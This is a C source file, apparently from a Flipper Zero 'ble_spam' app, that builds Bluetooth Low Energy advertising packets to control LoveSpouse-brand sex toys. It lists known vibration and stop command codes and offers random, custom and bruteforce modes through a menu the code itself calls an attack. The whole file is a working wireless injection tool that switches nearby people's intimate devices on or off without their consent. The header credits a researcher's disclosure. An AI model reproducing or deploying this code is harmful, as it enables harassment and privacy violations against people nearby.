Momentum-Apps/ble_spam/protocols/lovespouse.c

#include "lovespouse.h"
#include "_protocols.h"

// Hacked together by @Willy-JL
// Discovered by @mandomat
// Blog post at https://mandomat.github.io/2023-11-13-denial-of-pleasure/

typedef struct {
    uint32_t value;
    const char* name;
} LovespouseMode;

static const LovespouseMode plays[] = {
    // clang-format off
    {0xE49C6C, "Classic 1"},
    {0xE7075E, "Classic 2"},
    {0xE68E4F, "Classic 3"},
    {0xE1313B, "Classic 4"},
    {0xE0B82A, "Classic 5"},
    {0xE32318, "Classic 6"},
    {0xE2AA09, "Classic 7"},
    {0xED5DF1, "Classic 8"},
    {0xECD4E0, "Classic 9"},
    {0xD41F5D, "Independent 1-1"},
    {0xD7846F, "Independent 1-2"},
    {0xD60D7E, "Independent 1-3"},
    {0xD1B20A, "Independent 1-4"},
    {0xD0B31B, "Independent 1-5"},
    {0xD3A029, "Independent 1-6"},
    {0xD22938, "Independent 1-7"},
    {0xDDDEC0, "Independent 1-8"},
    {0xDC57D1, "Independent 1-9"},
    {0xA4982E, "Independent 2-1"},
    {0xA7031C, "Independent 2-2"},
    {0xA68A0D, "Independent 2-3"},
    {0xA13579, "Independent 2-4"},
    {0xA0BC68, "Independent 2-5"},
    {0xA3275A, "Independent 2-6"},
    {0xA2AE4B, "Independent 2-7"},
    {0xAD59B3, "Independent 2-8"},
    {0xACD0A2, "Independent 2-9"},
    // clang-format on
};

static const LovespouseMode stops[] = {
    {0xE5157D, "Classic Stop"},
    {0xD5964C, "Independent 1 Stop"},
    {0xA5113F, "Independent 2 Stop"},
};

static const struct {
    const LovespouseMode* modes;
    uint8_t count;
} modes[LovespouseStateCOUNT] = {
    [0] = {plays, COUNT_OF(plays)},
    [LovespouseStatePlay] = {plays, COUNT_OF(plays)},
    [LovespouseStateStop] = {stops, COUNT_OF(stops)},
};

static const char* get_name(const Payload* payload) {
    UNUSED(payload);
    return "LoveSpouse";
}

static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
    LovespouseCfg* cfg = payload ? &payload->cfg.lovespouse : NULL;

    LovespouseState state;
    if(cfg && cfg->state != 0x00) {
        state = cfg->state;
    } else {
        const LovespouseState states[] = {
            LovespouseStatePlay,
            LovespouseStateStop,
        };
        state = states[rand() % COUNT_OF(states)];
    }

    uint32_t mode;
    switch(cfg ? payload->mode : PayloadModeRandom) {
    case PayloadModeRandom:
    default:
        mode = modes[state].modes[rand() % modes[state].count].value;
        break;
    case PayloadModeValue:
        mode = cfg->mode;
        break;
    case PayloadModeBruteforce:
        mode = cfg->mode = payload->bruteforce.value;
        break;
    }

    uint8_t size = 22;
    uint8_t* packet = malloc(size);
    uint8_t i = 0;

    packet[i++] = 2; // Size
    packet[i++] = 0x01; // AD Type (Flags)
    packet[i++] = 0x1A; // Flags

    packet[i++] = 14; // Size
    packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
    packet[i++] = 0xFF; // Company ID (Typo Products, LLC)
    packet[i++] = 0x00; // ...
    packet[i++] = 0x6D;
    packet[i++] = 0xB6;
    packet[i++] = 0x43;
    packet[i++] = 0xCE;
    packet[i++] = 0x97;
    packet[i++] = 0xFE;
    packet[i++] = 0x42;
    packet[i++] = 0x7C;
    packet[i++] = (mode >> 0x10) & 0xFF;
    packet[i++] = (mode >> 0x08) & 0xFF;
    packet[i++] = (mode >> 0x00) & 0xFF;

    packet[i++] = 3; // Size
    packet[i++] = 0x03; // AD Type (Service UUID List)
    packet[i++] = 0x8F; // Service UUID (Unregistered)
    packet[i++] = 0xAE; // ...

    *_size = size;
    *_packet = packet;
}

enum {
    _ConfigExtraStart = ConfigExtraStart,
    ConfigMode,
    ConfigCOUNT,
};
static void config_callback(void* _ctx, uint32_t index) {
    Ctx* ctx = _ctx;
    scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
    switch(index) {
    case ConfigMode:
        scene_manager_next_scene(ctx->scene_manager, SceneLovespouseMode);
        break;
    default:
        ctx->fallback_config_enter(ctx, index);
        break;
    }
}
static void mode_changed(VariableItem* item) {
    Payload* payload = variable_item_get_context(item);
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    uint8_t index = variable_item_get_current_value_index(item);
    if(index) {
        index--;
        payload->mode = PayloadModeValue;
        cfg->mode = modes[cfg->state].modes[index].value;
        variable_item_set_current_value_text(item, modes[cfg->state].modes[index].name);
    } else {
        payload->mode = PayloadModeRandom;
        variable_item_set_current_value_text(item, "Random");
    }
}
static void extra_config(Ctx* ctx) {
    Payload* payload = &ctx->attack->payload;
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    VariableItemList* list = ctx->variable_item_list;
    VariableItem* item;
    uint8_t value_index;

    item = variable_item_list_add(
        list, "Toy Mode", modes[cfg->state].count + 1, mode_changed, payload);
    const char* mode_name = NULL;
    char mode_name_buf[9];
    switch(payload->mode) {
    case PayloadModeRandom:
    default:
        mode_name = "Random";
        value_index = 0;
        break;
    case PayloadModeValue:
        for(uint8_t i = 0; i < modes[cfg->state].count; i++) {
            if(cfg->mode == modes[cfg->state].modes[i].value) {
                mode_name = modes[cfg->state].modes[i].name;
                value_index = i + 1;
                break;
            }
        }
        if(!mode_name) {
            snprintf(mode_name_buf, sizeof(mode_name_buf), "%06lX", cfg->mode);
            mode_name = mode_name_buf;
            value_index = modes[cfg->state].count + 1;
        }
        break;
    case PayloadModeBruteforce:
        mode_name = "Bruteforce";
        value_index = modes[cfg->state].count + 1;
        break;
    }
    variable_item_set_current_value_index(item, value_index);
    variable_item_set_current_value_text(item, mode_name);

    variable_item_list_set_enter_callback(list, config_callback, ctx);
}

static uint8_t config_count(const Payload* payload) {
    UNUSED(payload);
    return ConfigCOUNT - ConfigExtraStart - 1;
}

const Protocol protocol_lovespouse = {
    .icon = &I_heart,
    .get_name = get_name,
    .make_packet = make_packet,
    .extra_config = extra_config,
    .config_count = config_count,
};

static void mode_callback(void* _ctx, uint32_t index) {
    Ctx* ctx = _ctx;
    Payload* payload = &ctx->attack->payload;
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    if(index == 0) {
        payload->mode = PayloadModeRandom;
        view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
    } else if(index == modes[cfg->state].count + 1U) {
        scene_manager_next_scene(ctx->scene_manager, SceneLovespouseModeCustom);
    } else if(index == modes[cfg->state].count + 2U) {
        payload->mode = PayloadModeBruteforce;
        payload->bruteforce.counter = 0;
        payload->bruteforce.value = cfg->mode;
        payload->bruteforce.size = 3;
        view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
    } else {
        payload->mode = PayloadModeValue;
        cfg->mode = modes[cfg->state].modes[index - 1].value;
        view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
    }
}
void scene_lovespouse_mode_on_enter(void* _ctx) {
    Ctx* ctx = _ctx;
    Payload* payload = &ctx->attack->payload;
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    Submenu* submenu = ctx->submenu;
    uint32_t selected = 0;

    submenu_add_item(submenu, "Random", 0, mode_callback, ctx);
    if(payload->mode == PayloadModeRandom) {
        selected = 0;
    }

    bool found = false;
    for(uint8_t i = 0; i < modes[cfg->state].count; i++) {
        submenu_add_item(submenu, modes[cfg->state].modes[i].name, i + 1, mode_callback, ctx);
        if(!found && payload->mode == PayloadModeValue &&
           cfg->mode == modes[cfg->state].modes[i].value) {
            found = true;
            selected = i + 1;
        }
    }
    submenu_add_item(submenu, "Custom", modes[cfg->state].count + 1, mode_callback, ctx);
    if(!found && payload->mode == PayloadModeValue) {
        selected = modes[cfg->state].count + 1;
    }

    submenu_add_item(submenu, "Bruteforce", modes[cfg->state].count + 2, mode_callback, ctx);
    if(payload->mode == PayloadModeBruteforce) {
        selected = modes[cfg->state].count + 2;
    }

    submenu_set_selected_item(submenu, selected);

    view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
}
bool scene_lovespouse_mode_on_event(void* _ctx, SceneManagerEvent event) {
    Ctx* ctx = _ctx;
    if(event.type == SceneManagerEventTypeCustom) {
        scene_manager_previous_scene(ctx->scene_manager);
        return true;
    }
    return false;
}
void scene_lovespouse_mode_on_exit(void* _ctx) {
    Ctx* ctx = _ctx;
    submenu_reset(ctx->submenu);
}

static void mode_custom_callback(void* _ctx) {
    Ctx* ctx = _ctx;
    Payload* payload = &ctx->attack->payload;
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    payload->mode = PayloadModeValue;
    cfg->mode =
        (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
    view_dispatcher_send_custom_event(ctx->view_dispatcher, 0);
}
void scene_lovespouse_mode_custom_on_enter(void* _ctx) {
    Ctx* ctx = _ctx;
    Payload* payload = &ctx->attack->payload;
    LovespouseCfg* cfg = &payload->cfg.lovespouse;
    ByteInput* byte_input = ctx->byte_input;

    byte_input_set_header_text(byte_input, "Enter custom Toy Mode");

    ctx->byte_store[0] = (cfg->mode >> 0x10) & 0xFF;
    ctx->byte_store[1] = (cfg->mode >> 0x08) & 0xFF;
    ctx->byte_store[2] = (cfg->mode >> 0x00) & 0xFF;

    byte_input_set_result_callback(
        byte_input, mode_custom_callback, NULL, ctx, (void*)ctx->byte_store, 3);

    view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
}
bool scene_lovespouse_mode_custom_on_event(void* _ctx, SceneManagerEvent event) {
    Ctx* ctx = _ctx;
    if(event.type == SceneManagerEventTypeCustom) {
        scene_manager_previous_scene(ctx->scene_manager);
        scene_manager_previous_scene(ctx->scene_manager);
        return true;
    }
    return false;
}
void scene_lovespouse_mode_custom_on_exit(void* _ctx) {
    UNUSED(_ctx);
}